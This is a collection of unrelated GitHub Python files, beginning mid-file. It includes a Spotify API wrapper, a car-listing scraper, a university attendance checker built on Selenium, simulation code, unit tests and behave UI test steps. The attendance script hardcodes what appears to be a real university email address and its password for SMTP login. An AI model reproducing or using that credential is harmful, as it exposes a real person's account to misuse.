maxlen=WINDOW)\n\n self.plots[title][sub_title], = self.graphs[idx].plot(self.xdata[title][sub_title], self.ydata[title][sub_title])\n self.graphs[idx].legend(tuple(settings[title]['sub_title']), loc=3)\n\n plt.tight_layout()\n self.initialized = True\n\n def write_draw(self, title, y_value, x_value=None):\n \"\"\"\n for movable\n\n y_values = {'plus':1, 'minus': 1}\n x_values = {'plus':1, 'minus': 1}\n \"\"\"\n\n\n for key, value in y_value.items():\n self.ydata[title][key].append(value)\n\n\n if x_value is not None:\n for key, value in x_value.items():\n self.xdata[title][key].append(value)\n else:\n self.xdata[title][key].append(len(self.xdata[title][key]))\n\n\n # update\n for idx, title in enumerate(self.settings.keys()):\n for sub_title in self.settings[title]['sub_title']:\n self.plots[title][sub_title].set_xdata(self.xdata[title][sub_title])\n self.plots[title][sub_title].set_ydata(self.ydata[title][sub_title])\n\n self.graphs[idx].legend(tuple(self.settings[title]['sub_title']), loc=3)\n self.graphs[idx].relim()\n self.graphs[idx].autoscale_view(True, True, True)\n\n plt.draw()\n return plt\n\n\n","repo_name":"kokukuma/nupic_function_recognition","sub_path":"lib/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73722628266","text":"import spotipy\nfrom spotipy.oauth2 import 
SpotifyOAuth\nimport os\nimport json\nfrom urllib.request import urlretrieve\n\n\nclass Spotify:\n    def __init__(self):\n        os.environ['SPOTIPY_CLIENT_ID'] = ''\n        os.environ['SPOTIPY_CLIENT_SECRET'] = ''\n        os.environ['SPOTIPY_REDIRECT_URI'] = 'http://localhost:8888/callback'\n        \n        self.scope = \"user-library-read user-top-read user-read-currently-playing user-follow-read\"\n\n    def login(self):\n        self.sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=self.scope))\n        print(\"Connected as\", self.sp.current_user()['display_name'])\n\n    def current_info(self):\n        # fetch the response once: type(...) is never None, so the original check\n        # always passed, and repeated calls could race against a track change\n        playing = self.sp.currently_playing()\n        if playing is not None:\n            songName = playing['item']['name']\n            artistName = playing['item']['artists'][0]['name']\n            result = playing['item']['id']\n            features = self.sp.audio_analysis(result)\n            # return json.dumps(features, indent=4)\n            track = features['track']\n            informations = {'tempo': track['tempo'],\n                            'name': songName,\n                            'artist': artistName,\n                            'key': track['key'],\n                            'mode': track['mode'],\n                            'cover_url': playing['item']['album']['images'][0]['url']}\n\n            return informations\n        else:\n            return \"ERROR: App could not find any songs playing right now. Please open a song and try again.\"\n\n\n    def _load_json(self, json_file):\n        with open(json_file) as file:\n            tonal_information = json.load(file)\n\n        return tonal_information\n\n    def currentSong(self, json_file):\n        tonal_information = self._load_json(json_file)\n        song_information = self.current_info()\n\n        informations = {'song': song_information['name'],\n                        'artist': song_information['artist'],\n                        'tempo': song_information['tempo'],\n                        'key': tonal_information['pitchClass'][str(song_information['key'])],\n                        'mode': tonal_information['mode'][str(song_information['mode'])],\n                        'cover_url': song_information['cover_url']}\n\n        return informations\n\n    def download_cover(self, url):\n        urlretrieve(url, \"static/cover.png\")\n","repo_name":"eren-darici/spotify-keyfinder","sub_path":"SpotifyAPIManager.py","file_name":"SpotifyAPIManager.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"74286628586","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport pymongo\n\nclient=pymongo.MongoClient('localhost',27017)\nsecond=client['xiao_zhu']\nhz=second['hz']\n\ndef get_page_info(url):\n    web_data=requests.get(url)\n    time.sleep(2)\n    soup=BeautifulSoup(web_data.text,'lxml')\n    titles=soup.select('div.list > ul > li > div > p.infoBox > a')\n    images=soup.select('div.list > ul > li > div > a > img')\n    prices=soup.select('div.list > ul > li > div > p.priType-s > span > i')\n    for title,image,price in zip(titles,images,prices):\n        info={\n            'title':title.get_text(),\n            'image':image.get('src'),\n            # strip the '万' (ten-thousand) unit and stray spaces from the price\n            'price':price.get_text().replace(u'万', '').replace(' ', '')\n        }\n        hz.insert_one(info)\n        print(info)\ndef get_totalPage_info():\n    urls=[\"https://www.guazi.com/cd/buy/o{}/\".format(str(i)) for i in range(1,382,1)]\n    for url in urls:\n        get_page_info(url)\nif __name__ == '__main__':\n    get_totalPage_info()","repo_name":"charlene93/Python","sub_path":"spider01/Second-handCar.py","file_name":"Second-handCar.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"24916820000","text":"import time\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import 
ChromeDriverManager\nfrom bs4 import BeautifulSoup\nimport smtplib\nfrom email.message import EmailMessage\nfrom datetime import datetime\n\nprint(\"Starting Automated Testing\")\nusername = input(\"Enter The Username Of Knowledge Pro\\n\")\npassword = input(\"Enter The Password Of Knowledge Pro\\n\")\nrecipient = input(\"Enter Email To Send Alerts\\n\")\ndriver = webdriver.Chrome(ChromeDriverManager().install())\n#Automated Selenium Testing\ndriver.get('http://www.google.com/')\nsearch_box = driver.find_element_by_name('q')\nsearch_box.send_keys('Presidency Knowledge Pro')\nsearch_box.submit()\nknowledgepro = driver.find_element_by_xpath('//*[@id=\"rso\"]/div[1]/div/div[1]/a/h3/span')\nknowledgepro.click()\ntime.sleep(3)\nusernameinput = driver.find_element_by_id('username')\npasswordinput = driver.find_element_by_id('password')\nusernameinput.send_keys(username)\npasswordinput.send_keys(password)\nlogin = driver.find_element_by_id(\"Login\")\nlogin.click()\nprint(\"Successfully Logged Into Knowledge Pro\\n\")\nsidebar = driver.find_element_by_id(\"sidebar_main_toggle\")\nsidebar.click()\nattendancePage = driver.find_element_by_xpath('//*[@id=\"sidebar_main\"]/div/div[1]/div[2]/ul/li[1]/a')\nattendancePage.click()\npage_source = driver.page_source\ndriver.quit()\n# BEAUTIFUL SOUP Extraction\nsoup = BeautifulSoup(page_source, features='lxml')\ndata = []\ntable = soup.find(\"table\")\ntable_body = table.find(\"tbody\")\nrows = table_body.findAll(\"tr\")\nfor row in rows:\n cols = row.findAll(\"td\")\n cols = [ele.text.strip() for ele in cols]\n data.append([ele for ele in cols if ele])\nprint(\"Uncleaned Data received\")\nprint(\"Data : \")\nprint(data)\nprint(\"\\n\")\ntime.sleep(3)\ndataClean1 = list(filter(None, data)) # Remove Empty List\ndataClean2 = dataClean1[2:-3] # Remove First Unnecessary and Last Unnecessary Row\nlessAttendance = {}\nborderAttendance = {}\ngoodAttendance = {}\nprint(\"\\nData Cleaned Successfully\\n\")\ntime.sleep(2)\nfor subject in dataClean2:\n try:\n first = int(subject[0])\n temp = float(subject[-1])\n if temp < 75:\n print(\"Low Attendance In \" + subject[1])\n lessAttendance[subject[1]] = temp\n elif 85 > temp > 75:\n print(\"BorderLine Attendance In \" + subject[1])\n borderAttendance[subject[1]] = temp\n else:\n print(\"Good Attendance In \" + subject[1])\n goodAttendance[subject[1]] = temp\n except ValueError:\n continue\n\nleastString = \"\"\nfor subject, marks in lessAttendance.items():\n temp = str(subject) + \" : \" + str(marks)\n leastString = leastString + \"\\n\" + temp\nborderString = \"\"\nfor subject, marks in borderAttendance.items():\n temp = str(subject) + \" : \" + str(marks)\n borderString = borderString + \"\\n\" + temp\ngoodString = \"\"\nfor subject, marks in goodAttendance.items():\n temp = str(subject) + \" : \" + str(marks)\n goodString = goodString + temp\nprint(\"\\nLow Attendance And Border Attendance Subjects Obtained\\n\")\ntime.sleep(2)\nemail = \"201810100741@presidencyuniversity.in\"\npassword = \"Uzair2005\"\nprint(\"Initiating Email Process\")\ntime.sleep(2)\n# Initiating Email\nsmtpObj = smtplib.SMTP('smtp.gmail.com', 587)\nsmtpObj.ehlo()\nsmtpObj.starttls()\nprint(\"Email Id Setup Complete\")\nmsg = EmailMessage()\nmsg.set_content(\"The Following Courses Have VERY LOW ATTENDANCE : %s\\n\\nThese Courses Are In The Border Line : %s \" % (\n leastString, borderString))\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\nmsg['Subject'] = 'Attendance Alerts Auto Generated [%s]' % current_time\nmsg['From'] = 
+{"seq_id":"36759708990","text":"import unittest\ndef Sum(arg):\n    Total = 0\n    for x in arg:\n        Total += x\n    return Total\n\nclass Test_sum(unittest.TestCase):\n    def test_sum(self):\n        # Exercise the Sum() defined above (the original called the builtin\n        # sum() and used data that did not add up to the expected value).\n        data = [1, 2, 3]\n        res = Sum(data)\n        self.assertEqual(res, 6)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n\n","repo_name":"kaizokouabhijit/Python","sub_path":"Testing_In_Python/Test_sum.py","file_name":"Test_sum.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"69937962989","text":"from generators import *\nfrom controllers import *\nfrom applications import Application1\nfrom monitoring import Monitoring\nfrom simulationlist import SimulationWithDependeciesList\n\nstime = 0.2\nappSLA = stime * 3\nhorizon = 2000\nmonitoringWindow = 10\ninitCores = 100\nperiod = 1\n\nc0 = CTControllerScaleX(period, initCores); c0.setName(\"ScaleX\")\nc1 = CTControllerScaleX(period, initCores); c1.setName(\"ScaleX\")\nc2 = CTControllerScaleX(period, initCores); c2.setName(\"ScaleX\")\nc3 = CTControllerScaleX(period, initCores); c3.setName(\"ScaleX\")\nc4 = CTControllerScaleX(period, initCores); c4.setName(\"ScaleX\")\n\n\napps = [Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores)]\ncts = [c0, c1, c2, c3, c4] # a controller for each App\nmns = [Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA)]\n\nc0.setSLA(apps[0].sla); c1.setSLA(apps[1].sla); c2.setSLA(apps[2].sla); c3.setSLA(apps[3].sla); c4.setSLA(apps[4].sla)\nc0.setMonitoring(mns[0]); c1.setMonitoring(mns[1]); c2.setMonitoring(mns[2]); c3.setMonitoring(mns[3]); c4.setMonitoring(mns[4])\n\n\ng0 = SinGen(500, 700, 200); g0.setName(\"SN1 - App 1\") # a generator for each App\ng1 = RampGen(10, 800); g1.setName(\"RP1 - App 2\")\ng2 = SinGen(500, 700, 200); g2.setName(\"SN1 - App 2\")\ng3 = RampGen(10, 800); g3.setName(\"RP1 - App 3\")\ng4 = SinGen(500, 700, 200); g4.setName(\"SN1 - App 4\")\n\nc0.setGenerator(g0); c1.setGenerator(g1); c2.setGenerator(g2); c3.setGenerator(g3); c4.setGenerator(g4)\n\ngens = [g0, g1, g2, g3, g4] # set to each App\n\nsimul = SimulationWithDependeciesList(horizon, apps, gens, mns, cts)\nsimul.run()\nsimul.plot()","repo_name":"iticongolo/resourceAllocationSimulators","sub_path":"main-list.py","file_name":"main-list.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"784098227","text":"from typing import Any\n\nimport pytest\n\nfrom lsst.cm.tools.core.checker import Checker\nfrom lsst.cm.tools.core.handler import Handler\n\n\ndef test_bad_checker() -> None:\n    class BadChecker(Checker):\n        pass\n\n    with pytest.raises(TypeError):\n        Checker.get_checker(\"lsst.cm.tools.core\")\n\n\ndef test_bad_handler() -> None:\n    class 
BadHandler(Handler):\n @classmethod\n def bad_get_kwarg(cls) -> Any:\n return cls.get_kwarg_value(\"bad\")\n\n def bad_resolve_templated(self) -> None:\n self.config[\"bad_template\"] = \"{missing}\"\n self.resolve_templated_string(\"bad_template\")\n\n with pytest.raises(TypeError):\n Handler.get_handler(-1, \"lsst.cm.tools.core.handler\")\n\n with pytest.raises(KeyError):\n BadHandler.bad_get_kwarg()\n\n\nif __name__ == \"__main__\":\n test_bad_handler()\n","repo_name":"lsst-dm/cm_tools","sub_path":"tests/test_bad_classes.py","file_name":"test_bad_classes.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40748053634","text":"\nimport unittest\nfrom player import Player\nfrom cardGame import CardGame\n\nclass TestPlayerDrawCard(unittest.TestCase):\n\n def testDrawCardFromEmptyDrawPile(self):\n \"\"\" If a player with an empty draw pile tries to draw a card, the discard pile is shuffled into the draw pile.\"\"\"\n testPlayer = Player('test')\n testPlayer.addCardToDiscardPile(10)\n testPlayer.addCardToDiscardPile(7)\n testPlayer.addCardToDiscardPile(8)\n testPlayer.addCardToDiscardPile(3)\n \n testPlayer.drawCard()\n \n self.assertEqual(3, len(testPlayer.getDrawPile()))\n \n def testHigherCardShouldWin(self):\n \"\"\" When comparing two cards, the higher card should win.\"\"\"\n player1 = Player(\"Player 1\");\n player2 = Player(\"Player 2\");\n\n player1.addToDrawPile(1);\n player1.addToDrawPile(2);\n player1.addToDrawPile(3);\n\n player2.addToDrawPile(4);\n player2.addToDrawPile(5);\n player2.addToDrawPile(6);\n\n game = CardGame()\n game.play(player1,player2);\n\n self.assertTrue(player2.getNumberOfCards() > player1.getNumberOfCards());\n \n def testEqualCards(self):\n \"\"\"When comparing two cards of the same value, the winner of the next round should win 4 cards.\"\"\"\n \n player1 = Player(\"Player 1\");\n player2 = Player(\"Player 2\");\n \n player1.addToDrawPile(1);\n player1.addToDrawPile(2);\n player1.addToDrawPile(3);\n\n player2.addToDrawPile(1);\n player2.addToDrawPile(6);\n player2.addToDrawPile(6);\n\n game = CardGame()\n game.play(player1,player2);\n game.play(player1,player2);\n\n self.assertTrue(player2.getNumberOfCards() - player1.getNumberOfCards() == 4);\n\n","repo_name":"SpoiL3r/card-game","sub_path":"src/lib/cardGameTest.py","file_name":"cardGameTest.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24173357498","text":"import random\nimport time\nimport re\nimport urlparse\nfrom behave import *\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nSIDEBAR_GROUPS_LINK = '[href=\"/dashboard/groups\"]'\nSIDEBAR_APPROVALS = '[href=\"/dashboard/approvals\"]'\nGROUPS_HEADER_ELEMENT = '.panel-heading h1'\nGROUP_FILTER = '[class=\"form-control ng-isolate-scope\"]' # First tools is fixed dummy.\nCREATE_NEW_GROUP_BUTTON = \"\"\"[ng-click=\"addGroup()\"]>i\"\"\"\nTABLE_FIRST_ROW = '#content .panel-body table tbody tr td:first-child'\nGROUP_FORM = 'form[name=\"groupForm\"]'\nGROUP_NAME_INPUT = '#id_group_name'\nCOUNTRY_DROPDOWN = '[name=\"country\"] .btn'\nFIRST_OPTION = '.ui-select-choices-row'\nGROUP_TYPE_DROPDOWN = '[name=\"type\"] .btn'\n#MODAL_LOGIN_SUBMIT_BUTTON = '.modal-footer .btn-primary:not([disabled])'\nMODAL_LOGIN_SUBMIT_BUTTON = \"\"\".modal-footer [type=\"submit\"]\"\"\"\nEDIT_GROUP_BUTTON = 
'[ng-click=\"editGroup()\"]>i'\nMODAL_EDIT_GROUP_WINDOW = \"h3.modal-title.ng-binding\"\nPERMISSIONS_CELL = '[ng-controller=\"GroupLicenseTypeCtrl\"] td + td'\nTABLE_HEADER_SORT_BY_ID = 'thead + thead [st-sort=\"Id\"]'\nNEW_USER_BUTTON_TOOLBAR = \"\"\"[ng-click=\"actions.addUser()\"]\"\"\"\nFIRST_NAME_FIELD = '#id_first_name'\nLAST_NAME_FIELD = '#id_last_name'\nEMAIL_FIELD = '#id_email'\nUSER_SUCCESS_MESSAGE = '.gritter-success'\nUSER_TABLE_ROW = '[ng-repeat=\"user in filteredUsers\"]'\nGENERIC_MODAL = '.modal'\nCONFIRM_BUTTON = '.modal [ng-click=\"yes()\"]'\nLOADER = \"\"\".spinner\"\"\"\nCREATION_TOOLS_CHECKBOXES = \"\"\"[class=\"checkbox ng-scope\"]\"\"\"\nMORE_OPTIONS_BTN = \"\"\".dropdown-toggle[tooltip=\"More options\"]\"\"\"\nMORE_OPTIONS = '.dropdown.open>ul.dropdown-menu.dropdown-menu-right'\nGROUPS_TABLE = \"\"\"tr[ng-repeat=\"group in filteredGroups\"]\"\"\"\nUSERS_ROLES = \"\"\"a.ng-binding\"\"\"\nAPPLIED_ROLES = \"\"\"[ng-repeat=\"role in user.Roles track by $index\"]\"\"\"\nDROPDOWN_SUBMIT = \"\"\".btn.btn-primary\"\"\"\nBLIPP_APPROVE_CHECKBOX = '[class=\"ng-scope ng-binding\"]'\nUSER_DROPDOWN = \"\"\"a[data-toggle=\"dropdown\"]\"\"\"\nGROUP_NAME_TITLE = '[for=\"id_group_name\"]'\nGROUP_TYPE_TITLE = '[mark-error=\"type\"]'\nCOUNTRY_TITLE = '[mark-error=\"country\"]'\nLICENSE_START_TITLE = '[for=\"id_license_start\"]'\nACCOUNT_MANAGER_TITLE = '[mark-error=\"account_manager\"]'\nGROUP_TYPE_SELECTOR = '.table.table.table-bordered.group-table.m-b-0 tbody tr:nth-child(4) td:nth-child(2)'\n\ndef select_group(context, group_name):\n context.execute_steps(u\"\"\"when filtering by {filter}\"\"\".format(filter=group_name))\n time.sleep(1)\n groups = context.browser.find_elements_by_css_selector(GROUPS_TABLE)\n for group in groups:\n #if group.text == re.search(\"(group_name)\", group.text):\n if group_name in group.text:\n print(\"lets click on \", group_name)\n group.click()\n else:\n assert False, \"Group {group} not found in {results}\".format(group=group_name, results=groups)\n\ndef action_on_checkbox(checkbox, action):\n input_element = checkbox.find_element_by_css_selector('input')\n checkbox_selected = input_element.is_selected()\n if action == 'enable':\n if checkbox_selected == False: #IF DISABLED CLICK ON THE ELEMENT\n input_element.click()\n return\n else:\n print('Checkbox already enabled, doing nothing')\n return\n elif action == 'disable':\n if checkbox_selected == True: #IF ENABLED CLICK ON THE ELEMENT\n input_element.click()\n return\n else:\n print('Checkbox already disabled, doing nothing')\n return\n else:\n assert False, \"Error specify a valid action (enable, disable)\"\n assert False, \"Error, the checkbox couldn't be {action}\".format(action=action)\n\ndef open_more_options(context):\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=MORE_OPTIONS_BTN))\n el = context.browser.find_element_by_css_selector(MORE_OPTIONS_BTN)\n action = ActionChains(context.browser)\n action.move_to_element(el).click().perform()\n\ndef get_more_options_settings(context):\n try:\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=MORE_OPTIONS))\n except:\n open_more_options(context)\n group_more_options = context.browser.find_element_by_css_selector(MORE_OPTIONS).text\n print(\"Group ops\", group_more_options)#.split(\"\\n\"))\n if group_more_options:\n return group_more_options.split(\"\\n\")\n else:\n assert False, \"Couldn't get group options\"\n\ndef 
\ndef get_active_roles(context):\n    roles_in_table=context.browser.find_elements_by_css_selector(APPLIED_ROLES)\n    active_roles=[str(role.text.strip(\",\").strip()) for role in roles_in_table]\n    print(\"Active user roles: \", active_roles)\n    return active_roles\n\ndef is_user_creator_role(context):\n    creation_tools_roles=['Blippbuilder (Classic) User', 'Blippbuilder (New) User', 'Custom (JavaScript) User']\n    active_roles=get_active_roles(context)\n    creator_roles_in_table=[x for x in active_roles if x in creation_tools_roles]\n    print(\"creator_roles_in_table\", creator_roles_in_table)\n    return creator_roles_in_table\n\n\ndef revoke_access(context):\n    roles_to_revoke = len(is_user_creator_role(context))\n    print(\"Roles to revoke\", roles_to_revoke)\n    while roles_to_revoke > 0 :\n        open_more_options(context)\n        more_settings = get_more_options_settings(context)\n        print(\"More settings\", more_settings)\n        for s in more_settings:\n            if s.startswith(u'Revoke'):\n                print(\"Found it\", s)\n                element = context.browser.find_element_by_link_text(s)\n                action = ActionChains(context.browser)\n                action.move_to_element(element).click().perform()\n                time.sleep(1)\n                print(\"Active roles after click\", get_active_roles(context))\n                open_more_options(context)\n            else:\n                print(\"No need to Revoke this access\", s)\n        roles_to_revoke -= 1\n    else:\n        print(\"This user doesn't have creation tool access\")\n
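The `revoke_access` helper above relies on Python's little-used `while ... else`: the `else` block runs whenever the loop exits because its condition became false (i.e. without a `break`), which is why the "doesn't have creation tool access" message also prints after roles were successfully revoked. A minimal, self-contained demonstration of that semantics (names are illustrative):

# while/else in isolation: the else clause runs on normal loop exit,
# whether the body ran zero times or many times, as long as no break fired.
def drain(count):
    while count > 0:
        count -= 1
    else:
        print("loop finished without break")

drain(0)  # prints immediately: the condition is false on the first check
drain(3)  # prints after three iterations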
{option}\".format(option=option_string)\n el=context.browser.find_elements_by_css_selector(element)\n el=el[0]\n roles = len(is_user_creator_role(context))\n if el.text.startswith(action):\n el.click()\n time.sleep(1)\n after_action_roles = len(is_user_creator_role(context))\n if action == \"Add\":\n assert roles + 1 == after_action_roles\n elif action == \"Revoke\":\n assert roles -1 == after_action_roles\n else:\n print(\"Is your action correct?\")\n print(\"Changed access\", el.text)\n time.sleep(1)\n else:\n print(\"No need to change this access\", el.text)\n\n# Load groups overview\n@when(\"navigating to Groups & Users\")\ndef step_impl(context):\n try:\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=USER_DROPDOWN))\n context.execute_steps(u\"\"\"when click on button {element} identified by css_selector\"\"\".format(element=USER_DROPDOWN))\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=SIDEBAR_GROUPS_LINK))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=SIDEBAR_GROUPS_LINK))\n context.execute_steps(u\"\"\"then expect {selector} to disappear within 30 seconds\"\"\".format(selector=LOADER))\n except:\n print(\"We have exception here: \", context.browser.title)\n\n\n@then(\"the Groups overview is loaded\")\ndef step_impl(context):\n context.execute_steps(\n u\"\"\"The screen Groups & users is opened\"\"\")\n\n@then(\"I wait for the filter to become visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_FILTER))\n\n\n@when(\"filtering by {group_id}\")\ndef step_impl(context, group_id):\n context.execute_steps(u\"\"\"when typing {value} in {selector}\"\"\".format(value=group_id, selector=GROUP_FILTER))\n time.sleep(1)\n\n@when(\"I select the group {group_name}\")\ndef step(context, group_name):\n select_group(context, group_name)\n\n@when(\"I open the group {group_name} for edition\")\ndef step(context, group_name):\n select_group(context, group_name)\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Group Info\"))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=EDIT_GROUP_BUTTON))\n\n@when(\"I open the group shown\")\ndef step(context):\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Group Info\"))\n\n@when('I revoke access to all tools for user {user}')\ndef step(context, user):\n context.execute_steps(u\"\"\"when filtering by {filter}\"\"\".format(filter=user))\n #get_active_roles(context)\n #open_more_options(context)\n #get_more_options_settings(context)\n revoke_access(context)\n\n@then('I check that the user has all tools revoked')\ndef step(context):\n assert True, len(is_user_creator_role(context)) == 0\n\n@when(\"I {action} access to {creation_tool} on group or user level\")\ndef step(context, action, creation_tool):\n toggle_group_access_more_options(context, action, creation_tool)\n get_active_roles(context)\n\n@then(\"the first result is a group with ID {group_id}\")\ndef step_impl(context, group_id):\n time.sleep(1)\n #context.execute_steps(u\"\"\"then allow 1s to update the UI\"\"\")\n context.execute_steps(\n u\"\"\"then expect {selector} to contain {group_id}\"\"\".format(selector=TABLE_FIRST_ROW, group_id=group_id))\n\n@when(\"I click on Approvals on the left sidebar\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking 
{selector}\"\"\".format(selector=SIDEBAR_APPROVALS))\n\n\n# Creating a group\n@when(\"I click on the New Group button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=CREATE_NEW_GROUP_BUTTON))\n\n@then(\"the create new group modal is visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=GROUP_FORM))\n\n@when(\"filling out the new group form with the group name {group_name}\")\ndef step_impl(context, group_name):\n context.execute_steps(u\"\"\"when typing {value} in {selector}\"\"\".format(value=group_name, selector=GROUP_NAME_INPUT))\n # Country\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=COUNTRY_DROPDOWN))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=FIRST_OPTION))\n # Group type\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=GROUP_TYPE_DROPDOWN))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(value=group_name, selector=FIRST_OPTION))\n\n@then(\"the submit button is clickable\")\ndef step_impl(context):\n #context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n context.execute_steps(u\"\"\"then wait for element {selector} to be clickable\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n\n\n@when(\"I click on the modal submit button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n context.execute_steps(u\"\"\"then expect {selector} to disappear\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n\n@then(\"a group is created with the group name {group_name}\")\ndef step_impl(context, group_name):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector='.gritter-title'))\n\n\n# Updating a group\n@when(\"navigating to the last group\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when navigating to Groups & Users\"\"\")\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=TABLE_HEADER_SORT_BY_ID))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=TABLE_FIRST_ROW))\n\n\n@when(\"I click on the edit group button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Group Info\"))\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=EDIT_GROUP_BUTTON))\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=EDIT_GROUP_BUTTON))\n\n\n@then(\"the edit group modal is visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element=GROUP_FORM))\n\n\n@when(\"I click on the edit group form submit button\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=MODAL_LOGIN_SUBMIT_BUTTON))\n\n\n@then(\"the group is renamed to {group_name}\")\ndef step_impl(context, group_name):\n context.execute_steps(u\"\"\"then I expect a success message\"\"\")\n selector = context.browser.find_element_by_css_selector(GROUP_NAME_SELECTOR).text\n assert selector == group_name, \"Error: obtained value {value} doesn't match expected value {group_name}\".format(value=selector, group_name=group_name)\n\n\n@then(u'the group is updated')\ndef 
step_impl(context):\n context.execute_steps(u\"\"\"then expect {selector} to disappear\"\"\".format(selector=MODAL_EDIT_GROUP_WINDOW))\n\n# Creating a user\n@when(\"I click on the users tab\")\ndef step_impl(context):\n time.sleep(2)\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Users\"))\n\n\n@when(\"I click on the new user button in the toolbar\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"when clicking {selector}\"\"\".format(selector=NEW_USER_BUTTON_TOOLBAR))\n\n\n@when(\"I create a new user trying any of the buttons\")\ndef step(context):\n context.execute_steps(u\"\"\"when click in link with text {text}\"\"\".format(text=\"Users\"))\n try:\n context.execute_steps(u\"\"\"when I click on the new user button\"\"\")\n except:\n context.execute_steps(u\"\"\"when I click on the new user button in the toolbar\"\"\")\n\n\n@then(\"the create new user modal is visible\")\ndef step_impl(context):\n context.execute_steps(u\"\"\"then wait for {selector}\"\"\".format(selector='h3.modal-title'))\n\n\n@when(\"filling out the new user form with first name {firstname} and last name {lastname}\")\ndef step_impl(context, firstname, lastname):\n email = 'someuser+group_admin_auto_{randy}@blippar.com'.format(randy=random.random())\n context.execute_steps(\n u\"\"\"when typing {firstname} in {selector}\"\"\".format(selector=FIRST_NAME_FIELD, firstname=firstname))\n context.execute_steps(\n u\"\"\"when typing {lastname} in {selector}\"\"\".format(selector=LAST_NAME_FIELD, lastname=lastname))\n context.execute_steps(u\"\"\"when typing {email} in {selector}\"\"\".format(selector=EMAIL_FIELD, email=email))\n\n\n@when(\"creating a user with first name {firstname} and last name {lastname} and email from global var {global_var}\")\ndef step(context, firstname, lastname, global_var):\n email = context.config.userdata[global_var]\n context.execute_steps(\n u\"\"\"when typing {firstname} in {selector}\"\"\".format(selector=FIRST_NAME_FIELD, firstname=firstname))\n context.execute_steps(\n u\"\"\"when typing {lastname} in {selector}\"\"\".format(selector=LAST_NAME_FIELD, lastname=lastname))\n context.execute_steps(u\"\"\"when typing {email} in {selector}\"\"\".format(selector=EMAIL_FIELD, email=email))\n\n\n@then(\"a user is created with first name {firstname} and last name {lastname}\")\ndef step_impl(context, firstname, lastname):\n context.execute_steps(\n u\"\"\"then expect {selector} to disappear within 5 seconds\"\"\".format(selector=DROPDOWN_SUBMIT))\n context.execute_steps(u\"\"\"then wait for element {element} identified by css_selector\"\"\".format(element='.gritter-title'))\n rows = context.browser.find_elements_by_css_selector(USER_TABLE_ROW)\n for row in rows:\n try:\n context.execute_steps(u\"\"\"then expect {selector} to contain {firstname}\"\"\".format(selector=USER_TABLE_ROW,\n firstname=firstname))\n context.execute_steps(\n u\"\"\"then expect {selector} to contain {lastname}\"\"\".format(selector=USER_TABLE_ROW, lastname=lastname))\n return\n except:\n pass\n assert False, 